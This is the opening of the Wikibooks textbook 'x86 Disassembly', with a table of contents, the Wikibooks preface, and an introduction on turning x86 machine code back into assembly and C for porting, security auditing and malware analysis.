0.1.2 Whatisthisbook? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
0.1.3 Whoaretheauthors? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
0.1.4 WikibooksinClass . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
0.1.5 HappyReading! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
0.2 Cover . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
0.3 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
0.3.1 WhatIsThisBookAbout? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
0.3.2 WhatWillThisBookCover? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
0.3.3 WhoIsThisBookFor? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
0.3.4 WhatAreThePrerequisites? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
0.3.5 WhatisDisassembly? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
1 Tools 4
1.1 AssemblersandCompilers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
1.1.1 Assemblers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
1.1.2 AssemblerConcepts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
1.1.3 IntelSyntaxAssemblers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
1.1.4 (x86)AT&TSyntaxAssemblers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
1.1.5 OtherAssemblers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
1.1.6 Compilers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5
1.1.7 CommonC/C++Compilers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
1.2 DisassemblersandDecompilers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
1.2.1 WhatisaDisassembler? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
1.2.2 x86Disassemblers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
1.2.3 DisassemblerIssues . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
1.2.4 Decompilers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
1.2.5 AGeneralviewofDisassembling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
1.2.6 Furtherreading . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
1.3 DisassemblyExamples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
1.3.1 Example: HelloWorldListing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
1.3.2 Example: BasicDisassembly . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
i
ii CONTENTS
1.4 AnalysisTools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
1.4.1 Debuggers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
1.4.2 HexEditors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
1.4.3 OtherToolsforWindows . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
1.4.4 GNUTools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
1.4.5 OtherToolsforLinux . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
1.4.6 XCodeTools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
2 Platforms 19
2.1 MicrosoftWindows . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
2.1.1 MicrosoftWindows . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
2.1.2 WindowsVersions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
2.1.3 VirtualMemory . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
2.1.4 SystemArchitecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
2.1.5 Systemcallsandinterrupts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
2.1.6 Win32API . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
2.1.7 NativeAPI . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
2.1.8 ntoskrnl.exe . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
2.1.9 Win32K.sys . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
2.1.10 Win64API . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
2.1.11 WindowsVista . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
2.1.12 WindowsCE/Mobile,andotherversions . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
2.1.13 “Non-ExecutableMemory” . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
2.1.14 COMandRelatedTechnologies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
2.1.15 RemoteProcedureCalls(RPC) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
2.2 WindowsExecutableFiles . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
2.2.1 MS-DOSCOMFiles . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
2.2.2 MS-DOSEXEFiles . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
2.2.3 PEFiles . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
2.2.4 RelativeVirtualAddressing(RVA) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
2.2.5 FileFormat . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
2.2.6 SectionTable . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
2.2.7 ImportsandExports-Linkingtoothermodules . . . . . . . . . . . . . . . . . . . . . . . 27
2.2.8 Exports . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28
2.2.9 Imports . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29
2.2.10 Resources . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
2.2.11 Relocations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
2.2.12 AlternateBoundImportStructure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
2.2.13 WindowsDLLFiles . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
2.3 Linux . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
2.3.1 Linux . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
2.3.2 SystemArchitecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
CONTENTS iii
2.3.3 ConfigurationFiles . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
2.3.4 Shells . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
2.3.5 GUIs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
2.3.6 Debuggers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
2.3.7 FileAnalyzers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
2.4 LinuxExecutableFiles . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
2.4.1 ELFFiles . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
2.4.2 RelocatableELFFiles . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
2.4.3 a.outFiles . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
3 CodePatterns 35
3.1 TheStack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
3.1.1 TheStack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
3.1.2 PushandPop . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
3.1.3 ESPInAction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
3.1.4 ReadingWithoutPopping . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
3.1.5 DataAllocation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
3.2 FunctionsandStackFrames . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
3.2.1 FunctionsandStackFrames . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
3.2.2 StandardEntrySequence . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36
3.2.3 StandardExitSequence . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37
3.2.4 Non-StandardStackFrames . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37
3.2.5 LocalStaticVariables . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38
3.3 FunctionsandStackFrameExamples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38
3.3.1 Example: NumberofParameters . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38
3.3.2 Example: StandardEntrySequences . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38
3.4 CallingConventions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39
3.4.1 CallingConventions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39
3.4.2 NotesonTerminology . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39
3.4.3 StandardCCallingConventions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40
3.4.4 C++CallingConvention . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41
3.4.5 NoteonNameDecorations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42
3.4.6 Furtherreading . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42
3.5 CallingConventionExamples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42
3.5.1 MicrosoftCCompiler . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42
3.5.2 GNUCCompiler . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43
3.5.3 Example: CCallingConventions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45
3.5.4 Example: NamedAssemblyFunction . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45
3.5.5 Example: UnnamedAssemblyFunction . . . . . . . . . . . . . . . . . . . . . . . . . . . 45
3.5.6 Example: AnotherUnnamedAssemblyFunction . . . . . . . . . . . . . . . . . . . . . . 45
3.5.7 Example: NameMangling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45
3.6 Branches . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45
iv CONTENTS
3.6.1 Branching . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45
3.6.2 If-Then . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46
3.6.3 If-Then-Else . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46
3.6.4 Switch-Case . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46
3.6.5 TernaryOperator?: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48
3.7 BranchExamples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48
3.7.1 Example: NumberofParameters . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48
3.7.2 Example: IdentifyBranchStructures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49
3.7.3 Example: ConvertToC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49
3.8 Loops . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49
3.8.1 Loops . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49
3.8.2 Do-WhileLoops . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 50
3.8.3 WhileLoops . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 50
3.8.4 ForLoops . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 50
3.8.5 OtherLoopTypes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 50
3.9 LoopExamples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51
3.9.1 Example: IdentifyPurpose . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51
3.9.2 Example: CompleteCPrototype . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51
3.9.3 Example: DecompileToCCode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51
4 DataPatterns 53
4.1 Variables . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 53
4.1.1 Variables . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 53
4.1.2 HowtoSpotaVariable . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 53
4.1.3 .BSSand.DATAsections . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 53
4.1.4 “Static”LocalVariables . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 53
4.1.5 SignedandUnsignedVariables . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54
4.1.6 Floating-PointValues . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54
4.1.7 GlobalVariables . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54
4.1.8 Constants . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 55
4.1.9 “Volatile”memory . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 55
4.1.10 SimpleAccessorMethods . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 55
4.1.11 SimpleSetter(Manipulator)Methods . . . . . . . . . . . . . . . . . . . . . . . . . . . . 56
4.2 VariableExamples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 56
4.2.1 Example: IdentifyC++Code . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 56
4.2.2 Example: IdentifyC++Code . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 56
4.3 DataStructures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 57
4.3.1 DataStructures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 57
4.3.2 Arrays . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 57
4.3.3 Structures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 58
4.3.4 AdvancedStructures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 58
4.3.5 IdentifyingStructsandArrays . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 58
CONTENTS v
4.3.6 LinkedListsandBinaryTrees . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59
4.4 ObjectsandClasses . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59
4.4.1 Object-OrientedProgramming . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59
4.4.2 Classes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59
4.4.3 ClassesVs. Structs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 60
4.5 FloatingPointNumbers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 60
4.5.1 FloatingPointNumbers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 60
4.5.2 CallingConventions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61
4.5.3 FloattoIntConversions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63
4.5.4 FPUComparesandJumps . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63
4.6 FloatingPointExamples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63
4.6.1 Example: FloatingPointArithmetic . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63
5 Difficulties 64
5.1 CodeOptimization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 64
5.1.1 CodeOptimization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 64
5.1.2 StagesofOptimizations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 64
5.1.3 LoopUnwinding . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65
5.1.4 InlineFunctions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65
5.2 OptimizationExamples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65
5.2.1 Example: OptimizedvsNon-OptimizedCode . . . . . . . . . . . . . . . . . . . . . . . . 65
5.2.2 Example: ManualOptimization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 66
5.2.3 Example: TraceVariables . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 66
5.2.4 Example: DecompileOptimizedCode . . . . . . . . . . . . . . . . . . . . . . . . . . . . 67
5.2.5 Example: InstructionPairings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 67
5.2.6 Example: AvoidingBranches . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 67
5.2.7 Example: Duff’sDevice . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 67
5.3 CodeObfuscation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 67
5.3.1 CodeObfuscation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 67
5.3.2 WhatisCodeObfuscation? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 68
5.3.3 Interleaving . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 68
5.3.4 Non-IntuitiveInstructions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 68
5.3.5 Obfuscators . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 69
5.3.6 CodeTransformations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70
5.3.7 OpaquePredicates . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70
5.3.8 CodeEncryption . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70
5.4 DebuggerDetectors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70
5.4.1 DetectingDebuggers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70
5.4.2 IsDebuggerPresentAPI . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70
5.4.3 PEBDebuggerCheck . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71
5.4.4 KernelModeDebuggerCheck . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71
5.4.5 Timeouts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71
vi CONTENTS
5.4.6 DetectingSoftICE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71
5.4.7 DetectingOllyDbg . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71
6 ResourcesandLicensing 72
6.1 Resources . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72
6.1.1 WikimediaResources . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72
6.1.2 ExternalResources . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72
6.2 Licensing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 73
6.2.1 Licensing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 73
6.3 ManualofStyle . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 73
6.3.1 GlobalStylesheet . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 73
7 Textandimagesources,contributors,andlicenses 74
7.1 Text . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 74
7.2 Images . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 75
7.3 Contentlicense . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 76
0.1. PREFACE 1
0.1 Preface
ThisbookwascreatedbyvolunteersatWikibooks( http:
//en.wikibooks.org ).
0.1.1 WhatisWikibooks?
Startedin2003asanoffshootofthepopularWikipedia
project, Wikibooks is a free, collaborative wiki website
dedicatedtocreatinghigh-qualitytextbooksandothered-
ucational books for students around the world. In addi-
tion to English, Wikibooks is available in over 130 lan-
guages,acompletelistingofwhichcanbefoundat http:
//www.wikibooks.org . Wikibooks is a “wiki”, which
means anybody can edit the content there at any time.
If you find an error or omission in this book, you can
log on to Wikibooks to make corrections and additions
asnecessary. Allofyourchangesgoliveonthewebsite
immediately, so your effort can be enjoyed and utilized
byotherreadersandeditorswithoutdelay.
Books at Wikibooks are written by volunteers, and can
beaccessedandprintedforfreefromthewebsite. Wiki-
booksisoperatedentirelybydonations,andacertainpor-
tionofproceedsfromsalesisreturnedtotheWikimedia
Foundation to help keep Wikibooks running smoothly.
Becauseofthelowoverhead,weareabletoproduceand
sell books for much cheaper then proprietary textbook
publisherscan. Thisbookcanbeeditedbyanybodyat
anytime,includingyou. We don't make you wait two
years to get a new edition, and we don't stop selling old
versionswhenanewonecomesout.
Note that Wikibooks is not a publisher of books, and
is not responsible for the contributions of its volunteer
editors. PediaPress.com is a print-on-demand publisher
that is also not responsible for the content that it prints.
Please see our disclaimer for more information: http://
en.wikibooks.org/wiki/Wikibooks:General_disclaimer .0.1.2 Whatisthisbook?
ThisbookwasgeneratedbythevolunteersatWikibooks,
a team of people from around the world with varying
backgrounds. The people who wrote this book may not
beexpertsinthefield. Somemaynotevenhaveapassing
familiarity with it. The result of this is that some infor-
mation in this book may be incorrect, out of place, or
misleading. For this reason, you should never rely on a
community-editedWikibookwhendealinginmattersof
medical,legal,financial,orotherimportance. Pleasesee
ourdisclaimerformoredetailsonthis.
Despitethewarningofthelastparagraph,however,books
at Wikibooks are continuously edited and improved. If
errors are found they can be corrected immediately. If
youfindaprobleminoneofourbooks,weaskthatyou
beboldinfixingit. Youdon'tneedanybody’spermission
tohelportomakeourbooksbetter.
Wikibooks runs off the assumption that many eyes can
findmanyerrors,andmanyablehandscanfixthem. Over
time,withenoughcommunityinvolvement,thebooksat
Wikibooks will become very high-quality indeed. You
areinvitedtoparticipateatWikibookstohelpmake
ourbooksbetter . As you find problems in your book
don't just complain about them: Log on and fix them!
This is a kindof proactive andinteractive reading expe-
rience that you probably aren't familiar with yet, so log
on tohttp://en.wikibooks.org and take a look around at
allthepossibilities. Wepromisethatwewon'tbite!
0.1.3 Whoaretheauthors?
The volunteers at Wikibooks come from around the
world and have a wide range of educational and profes-
sional backgrounds. They come to Wikibooks for dif-
ferent reasons, and perform different tasks. Some Wik-
ibookians are prolific authors, some are perceptive edi-
tors, some fancy illustrators, others diligent organizers.
Some Wikibookians find and remove spam, vandalism,
and other nonsense as it appears. Most Wikibookians
performacombinationofthesejobs.
It’s difficult to say who are the authors for any particu-
larbook, becausesomanyhandshavetoucheditandso
manychangeshavebeenmadeovertime. It’snotunheard
offorabooktohavebeeneditedthousandsoftimesby
hundredsofauthorsandeditors. You could be one of them
too,ifyou'reinterestedinhelpingout.
0.1.4 WikibooksinClass
Books at Wikibooks are free, and with the proper edit-
ing and preparation they can be used as cost-effective
textbooks in the classroom or for independent learners.
In addition to using a Wikibook as a traditional read-
onlylearningaide,itcanalsobecomeaninteractiveclass
2 CONTENTS
project. SeveralclasseshavecometoWikibookstowrite
new books and improve old books as part of their nor-
mal course work. In some cases, the books written by
students one year are used to teach students in the same
classnextyear. Bookswrittencanalsobeusedinclasses
around the world by students who might not be able to
affordtraditionaltextbooks.
0.1.5 HappyReading!
WeatWikibookshaveputalotofeffortintothesebooks,
and we hope that you enjoy reading and learning from
them. We want you to keep in mind that what you are
holding is not a finished product but instead a work in
progress. These books are never “finished” in the tradi-
tional sense, but they are ever-changing and evolving to
meettheneedsofreadersandlearnerseverywhere. De-
spitethisconstantchange,wefeelourbookscanbereli-
able and high-quality learning tools at a great price, and
we hope you agree. Never hesitate to stop in at Wiki-
booksandmakesomeeditsofyourown. Wehopetosee
youthereoneday. Happyreading!
0.2 Cover
TheWikibookof
x86Disassembly
UsingCandAssemblyLanguage
Library LibraryKernel
SoftwareLibrary
FromWikibooks: TheFreeLibrary
0.3 Introduction
0.3.1 WhatIsThisBookAbout?
Thisbookisaboutthedisassemblyofx86machinecode
intohuman-readableassembly,andthedecompilationofx86assemblycodeintohuman-readableCorC++source
code. Some topics covered will be common to all com-
puterarchitectures,notjustx86-compatiblemachines.
0.3.2 WhatWillThisBookCover?
Thisbookisgoingtolookin-depthatthedisassemblyand
decompilation of x86 machine code and assembly code.
We are going to look at the way programs are made us-
ingassemblersandcompilers, andexaminethewaythat
assemblycodeismadefromCorC++sourcecode. Us-
ingthisknowledge,wewilltrytoreversetheprocess. By
examining common structures, such as data and control
structures, we can find patterns that enable us to disas-
sembleanddecompileprogramsquickly.
0.3.3 WhoIsThisBookFor?
This book is for readers at the undergraduate level with
experience programming in x86 Assembly and C or
C++. This book is not designed to teach assembly lan-
guage programming, C or C++ programming, or com-
piler/assemblertheory.
0.3.4 WhatAreThePrerequisites?
Thereadershouldhaveathoroughunderstandingof x86
Assembly,CProgramming ,andpossibly C++Program-
ming. This book is intended to increase the reader’s
understanding of the relationship between x86 machine
code,x86AssemblyLanguage,andtheCProgramming
Language. If you are not too familar with these topics,
you may want to reread some of the above-mentioned
booksbeforecontinuing.
0.3.5 WhatisDisassembly?
Computer programs are written originally in a human
readablecodeform,suchasassemblylanguageorahigh-
level language. These programs are then compiled into
a binary format called machinecode . This binary for-
matisnotdirectlyreadableorunderstandablebyhumans.
Manyprograms--suchasmalware,proprietarycommer-
cial programs, or very old legacy programs -- may not
havethesourcecodeavailabletoyou.
Programs frequently perform tasks that need to be du-
plicated, or need to be made to interact with other pro-
grams. Without the source code and without adequate
documentation,thesetaskscanbedifficulttoaccomplish.
Thisbookoutlinestoolsandtechniquesforattemptingto
convert the raw machine code of an executable file into
equivalent code in assembly language and the high-level
languages C and C++. With the high-level code to per-
formaparticulartask,severalthingsbecomepossible:
0.3. INTRODUCTION 3
1.Programscanbeportedtonewcomputerplatforms,
bycompilingthesourcecodeinadifferentenviron-
ment.
2.The algorithm used by a program can be deter-
mined. This allows other programs to make use of
thesamealgorithm,orforupdatedversionsofapro-
gramtoberewrittenwithoutneedingtotrackdown
oldcopiesofthesourcecode.
3.Security holes and vulnerabilities can be identified
andpatchedbyuserswithoutneedingaccesstothe
originalsourcecode.
4.New interfaces can be implemented for old pro-
grams. Newcomponentscanbebuiltontopofold
componentstospeeddevelopmenttimeandreduce
theneedtorewritelargevolumesofcode.
5.Wecanfigureoutwhatapieceofmalwaredoes. We
hope this leads us to figuring out how to block its
harmfuleffects. Unfortunately,somemalwarewrit-
ers use self-modifying code techniques (polymor-
phic camouflage, XOR encryption, scrambling)[1],
apparently to make it difficult to even detect that
malware,muchlessdisassembleit.
Disassemblingcodehasalargenumberofpracticaluses.
Oneofthepositivesideeffectsofitisthatthereaderwill
gain a better understanding of the relation between ma-
chinecode,assemblylanguage,andhigh-levellanguages.
Having a good knowledge of these topics will help pro-
grammerstoproducecodethatismoreefficientandmore
secure.
[1]“Howdoesacrypterforbypassantivirusdetectionwork?"
Chapter1
Tools
1.1 AssemblersandCompilers
1.1.1 Assemblers
Assemblers aresignificantlysimplerthancompilers,and
are often implemented to simply translate the assembly
code to binary machine code via one-to-one correspon-
dence. Assemblers rarely optimize beyond choosing the
shortestformofaninstructionorfillingdelayslots.
Because assembly is such a simple process, disassem-
